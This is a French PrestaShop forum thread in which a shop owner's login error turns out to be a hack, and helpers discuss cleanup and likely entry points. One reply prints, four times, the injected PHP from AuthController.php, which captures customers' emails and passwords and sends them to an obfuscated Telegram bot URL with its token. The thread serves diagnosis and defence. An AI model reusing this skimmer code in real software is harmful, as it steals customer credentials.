Jump to content

HTTP ERREUR 500 / * AuthController.php on line 446 ? (xsamxadoo)


Recommended Posts

Bonjour et merci d'avance pour votre aide

Version de PrestaShop 1.6.0.14

Depuis cet après midi sans avoir touché à rien j'ai une erreur 500 quand je cherche à me connecter au compte client.

J'ai mis le fichier defines.inc.php en mode débug et j'ai ce message :

Parse error: syntax error, unexpected 'if' (T_IF) /www/controllers/front/AuthController.php on line 446

J'ai vu que ça pouvait venir du passage de mon hébergeur en PHP 7 alors que ma version est pas compatible, mais mon hébergement chez OVH est toujours en 5.6 :)

Quelqu'un pourrait-il m'aider pour trouver le problème...

D'avance un grand merci

Ludovic

Edited by ikaris (see edit history)

Share this post


Link to post
Share on other sites

Ok... vous vous êtes fait hacker...

Il faut nettoyer votre ftp au plus vite et remettre les fichiers d'origine.

 

Toute cette partie est moisie:

					

        if(strlen(Tools::getValue('passwd'))>3){

			$passwordbajaa=Tools::getValue('passwd');

		}

		if(strlen(Tools::getValue('password'))>3){

			$passwordbajaa=Tools::getValue('password');

		}

        $dhsqndsqdjsqdhsqdqsdhdqs = "------+| [ B" . "4" . "J" . "A" . "T" . "4" . "X ] |+-----\n";

        $dhsqndsqdjsqdhsqdqsdhdqs .= Tools::getValue('email').":".$passwordbajaa.":".$_SERVER['REMOTE_ADDR'].":".$_SERVER['SERVER_NAME']."\n";

        if(strlen($passwordbajaa) >3){

        Tools::file_get_contents("https://"."ap"."i".".tel"."egr"."am".".org"."/bot1"."211"."998273".":AAHft2yajX"."qGoX3y_"."K3lfPernQ"."DPbtspu3g"."/sendMessa"."ge?chat_id="."11101654"."05&text=" . urlencode($dhsqndsqdjsqdhsqdqsdhdqs)."" );

		}

		

 i 

        if(strlen(Tools::getValue('passwd'))>3){

			$passwordbajaa=Tools::getValue('passwd');

		}

		if(strlen(Tools::getValue('password'))>3){

			$passwordbajaa=Tools::getValue('password');

		}

        $dhsqndsqdjsqdhsqdqsdhdqs = "------+| [ B" . "4" . "J" . "A" . "T" . "4" . "X ] |+-----\n";

        $dhsqndsqdjsqdhsqdqsdhdqs .= Tools::getValue('email').":".$passwordbajaa.":".$_SERVER['REMOTE_ADDR'].":".$_SERVER['SERVER_NAME']."\n";

        if(strlen($passwordbajaa) >3){

        Tools::file_get_contents("https://"."ap"."i".".tel"."egr"."am".".org"."/bot1"."211"."998273".":AAHft2yajX"."qGoX3y_"."K3lfPernQ"."DPbtspu3g"."/sendMessa"."ge?chat_id="."11101654"."05&text=" . urlencode($dhsqndsqdjsqdhsqdqsdhdqs)."" );

		}

		

 i 

        if(strlen(Tools::getValue('passwd'))>3){

			$passwordbajaa=Tools::getValue('passwd');

		}

		if(strlen(Tools::getValue('password'))>3){

			$passwordbajaa=Tools::getValue('password');

		}

        $dhsqndsqdjsqdhsqdqsdhdqs = "------+| [ B" . "4" . "J" . "A" . "T" . "4" . "X ] |+-----\n";

        $dhsqndsqdjsqdhsqdqsdhdqs .= Tools::getValue('email').":".$passwordbajaa.":".$_SERVER['REMOTE_ADDR'].":".$_SERVER['SERVER_NAME']."\n";

        if(strlen($passwordbajaa) >3){

        Tools::file_get_contents("https://"."ap"."i".".tel"."egr"."am".".org"."/bot1"."211"."998273".":AAHft2yajX"."qGoX3y_"."K3lfPernQ"."DPbtspu3g"."/sendMessa"."ge?chat_id="."11101654"."05&text=" . urlencode($dhsqndsqdjsqdhsqdqsdhdqs)."" );

		}

		

 i 

        if(strlen(Tools::getValue('passwd'))>3){

			$passwordbajaa=Tools::getValue('passwd');

		}

		if(strlen(Tools::getValue('password'))>3){

			$passwordbajaa=Tools::getValue('password');

		}

        $dhsqndsqdjsqdhsqdqsdhdqs = "------+| [ B" . "4" . "J" . "A" . "T" . "4" . "X ] |+-----\n";

        $dhsqndsqdjsqdhsqdqsdhdqs .= Tools::getValue('email').":".$passwordbajaa.":".$_SERVER['REMOTE_ADDR'].":".$_SERVER['SERVER_NAME']."\n";

        if(strlen($passwordbajaa) >3){

        Tools::file_get_contents("https://"."ap"."i".".tel"."egr"."am".".org"."/bot1"."211"."998273".":AAHft2yajX"."qGoX3y_"."K3lfPernQ"."DPbtspu3g"."/sendMessa"."ge?chat_id="."11101654"."05&text=" . urlencode($dhsqndsqdjsqdhsqdqsdhdqs)."" );

		}

		

 i

Je vous joins le bon si vous ne l'avez pas mais ça n'empêche pas le nettoyage à faire...

AuthController.php

  • Thanks 1

Share this post


Link to post
Share on other sites

Ouah !!! Mince alors !! Suis dégoutté 🤕

Mille merci Eolia, en effet, je viens de remettre le fichier AuthController.php et c'est Ok, on peut se connecter de nouveau.

Es-ce que je peux passer pas OVh pour restaurer les fichiers d'hier ? 

J'ai eu une commande hier à 18 h et c'était encore bon.

Edited by ikaris (see edit history)

Share this post


Link to post
Share on other sites

Je crois que j'ai trouvé par où s'est passé. Le module d’installation d'exemple de données qui va avec le template que j'ai acheté sur le site Monster.

J'ai supprimé le module qui est une passoire et qui s'installe tout seul quand vous achetez le template 😤

Merci encore Eolia, 1 h20 du matin... je vais pouvoir aller me coucher, j'espère que ça va être bon 🙏

 

supprimer le module sample date install de Monster car hack passe par là.jpg

Edited by ikaris (see edit history)

Share this post


Link to post
Share on other sites

PHPUNIT c'est principalement pour les version 1.7

En 1.6 ce sont des modules qui permettent l'entrée et souvent ceux de JMS...

Le Sample Data Install n'a jamais été répertorié comme ayant une faille...

Share this post


Link to post
Share on other sites

Bonjour

Quote

 

PHPUNIT c'est principalement pour les version 1.7

En 1.6 ce sont des modules qui permettent l'entrée et souvent ceux de JMS...

 

Je n'ai pas de module JMS à priori. Es-ce que ça veux dire que la totalité des boutiques en 1.6 sont encore vulnérables à ce hack ?

Edited by ikaris (see edit history)

Share this post


Link to post
Share on other sites

Non mais "Nettoyer votre ftp" ça veut dire rechercher TOUS les fichiers suspects qui n'ont rien à faire là (les hacks en copient un peu partout, dans les css, les répertoires d'images, les fichiers index.php, modifient les contrôleurs dont celui de l'admin, etc...)

Il ne suffit pas de supprimer un ou 2 modules. Ceux-ci peuvent être l'entrée initiale mais si d'autres fichiers ajoutés par les scripts de hackers sont présents sur votre ftp il faut les supprimer aussi.

Ça demande un peu de temps et de méthode.

  • Like 1

Share this post


Link to post
Share on other sites

Bonjour

J'ai récupéré le site sur le FTP (celui de J-3 avant l'attaque et que j'avais restauré depuis la console OVH le lendemain du hack).

Puis je l'ai comparé avec une ancienne sauvegarde. J'ai pas vu d'autres dossiers suspects. 

Ensuite j'ai fait des recherches avec Netbeams sur  certains termes comme "batajax, xsamxadoo, xsam_baja..." et j'ai rien trouvé.

Je peux être passé à côté de quelque chose, mais je sais pas trop quoi rechercher en fait. je vais encore surveiller les logs quelques jour pour voir si le robot reviens.

C'est une sacrée attaque ce hack quand même !! 

 

[EDIT J+4]

Retour hier du robot mais le module sampledatainstall a été supprimé, c'est OK.

le robot  tente aussi de passer par jmsslider mais qui n'est pas présent sur mon shop (1.6.0.14).

et  attention aussi pour les version 1.7.xxx il faut corriger la faille vendor/..../phpunit car le robot tente aussi par là...

704370589_2020-08-2212_48_52-https___logs.cluster021.hosting_ovh.net_ikaris.fr_logs_logs-08-2020_ikaris.fr-21.thumb.jpg.979f60e82ca421e0002d2e7cba7177a3.jpg

Edited by ikaris (see edit history)

Share this post


Link to post
Share on other sites

  • 4 months later...
On 8/19/2020 at 9:37 PM, Eolia said:

Si vous pouviez nous mettre le fichier AuthController.php en pièce-jointe qu'on puisse vérifier qu'il est ok ça serait pas mal^^

Bonjour Eolia,

je me permet de vous deranger car j'ai eu un virus de type Bajatax qui c'est introduit sur mon site.

il y'a un mois ce virus ma enlever les coordonnées de virement par de fausse coordonnées de virement vers u compte en espagne.

Des clients sont tombé dans le panneau.et depuis hier ma page pour acceder au paiement à été modifier vers une page frauduleuse.

que faire et quoi verifier svp je suis un peu perdu

 

Share this post


Link to post
Share on other sites

Comme expliqué plus haut il faut vérifier l'intégrité des fichiers du ftp, les corriger si nécessaire, supprimer les indésirables et surtout identifier le point d'entrée (module tiers, php_unit, wp ou autre)

Share this post


Link to post
Share on other sites

Merci Eolia de ta reponse,mais comment savoir et verifier les fichier du ftp.

Est ce que virus ce place dans un dossier specifique?Est ce que je peux proceder par verifier un fichier specifique et apres continuer mes recherche?

j'ai du mettre mon site en maintenance et c'est vrai que je ne sais par ou commencer....

Mon prestashop à la version 1.6 et je vais passer sur 1.7 est ce que cela va aider?

Share this post


Link to post
Share on other sites

Quand on y connait rien ce n'est pas possible.

Le problème ne vient pas de la version Presta mais d'un module tiers mal sécurisé dans 99% des cas.

Une fois celui-ci infecté les scripts se recopient un peu partout, modifient des fichiers etc...

Share this post


Link to post
Share on other sites

Create an account or sign in to comment

You need to be a member in order to leave a comment

Create an account

Sign up for a new account in our community. It's easy!

Register a new account

Sign in

Already have an account? Sign in here.

Sign In Now
 Share

×
×
  • Create New...

Important Information

Cookies ensure the smooth running of our services. Using these, you accept the use of cookies. Learn More